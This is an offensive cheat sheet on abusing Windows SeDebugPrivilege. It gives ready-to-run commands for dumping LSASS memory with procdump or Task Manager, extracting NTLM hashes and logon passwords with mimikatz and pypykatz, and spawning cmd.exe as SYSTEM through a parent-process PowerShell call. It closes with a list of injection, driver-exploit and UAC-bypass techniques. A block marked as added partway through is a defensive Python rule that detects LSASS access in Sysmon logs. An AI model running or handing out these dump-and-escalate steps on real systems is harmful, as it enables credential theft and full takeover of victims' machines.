
SeDebugPrivilege

Check whether the current token holds SeDebugPrivilege

whoami /priv

Dumping LSASS process credentials

Procdump

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Extract hashes

pypykatz lsa minidump lsass.dmp

OR

Extract NTLM hash

mimikatz.exe 
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Remote Code Execution using "SeDebugPrivilege"

Download POC script

Exploit

OR

1. Verify SeDebugPrivilege:

  • whoami /priv

2. Dump LSASS:

  • procdump.exe -accepteula -ma lsass.exe lsass.dmp

  • (Task Manager: Right-click lsass.exe -> Create dump file)

3. Extract Credentials:

  • mimikatz.exe

  • sekurlsa::minidump lsass.dmp

  • sekurlsa::logonpasswords

4. RCE as SYSTEM:

  • [MyProcess]::CreateProcessFromParent(<PID>,"cmd.exe","") (PowerShell)

  • (Alternative tools exist; the exact invocation depends on the tool)
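The detection-side counterpart to the dump steps above, added here as an example and not part of the original page: a small Python rule over Sysmon Event ID 10 (ProcessAccess) records that flags any non-allowlisted process opening lsass.exe with PROCESS_VM_READ or full access. The allowlist and the sample events are constructed assumptions to be tuned per environment.

```python
"""
Detection rule for LSASS credential dumping, built on Sysmon Event ID 10
(ProcessAccess). The allowlist and the sample events are constructed.
"""

# Access-mask bits from the Win32 process-access rights.
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Hypothetical allowlist of images that legitimately open LSASS; tune per environment.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def is_suspicious_lsass_access(event: dict) -> bool:
    """True when a Sysmon EID 10 record looks like a read of LSASS memory."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if event.get("SourceImage", "").lower() in ALLOWLIST:
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    # Reading credential material needs PROCESS_VM_READ (0x10); MiniDumpWriteDump-based
    # tools such as procdump and Task Manager usually request PROCESS_ALL_ACCESS (0x1FFFFF).
    # Query-only masks (e.g. 0x1400) are common and benign, so they are not flagged.
    return bool(granted & PROCESS_VM_READ) or granted == PROCESS_ALL_ACCESS


def triage(events):
    """Return (SourceImage, GrantedAccess) for every event that trips the rule."""
    return [(e["SourceImage"], e["GrantedAccess"])
            for e in events if is_suspicious_lsass_access(e)]


LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [  # constructed records using Sysmon's field names
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\Downloads\procdump.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\x.exe", "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\x.exe", "TargetImage": LSASS, "GrantedAccess": "0x1400"},
    {"EventID": 1, "Image": r"C:\Windows\Temp\x.exe"},  # process-create event, not in scope
]

if __name__ == "__main__":
    for source, access in triage(SAMPLE_EVENTS):
        print(f"ALERT: {source} opened lsass.exe with {access}")
```

Do not allowlist taskmgr.exe to quiet the rule: the Task Manager "Create dump file" path on the page produces exactly this event shape, and suppressing it removes a common operator-driven dump from view.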

Tools:

  • pypykatz: For LSASS dump analysis on non-Windows systems.

  • Process Explorer (Sysinternals): For detailed process information.

  • WinDbg: For advanced process debugging and memory analysis.

Techniques:

  • DLL Injection: Injecting malicious code into privileged processes.

  • Handle Duplication: Gaining access to privileged process resources.

  • Exploiting Vulnerable Drivers: Leveraging SeDebugPrivilege to exploit kernel vulnerabilities.

  • Bypassing User Account Control (UAC): Using UAC bypasses to obtain the elevated (high-integrity) context, since the UAC-filtered token of an administrator does not carry SeDebugPrivilege.
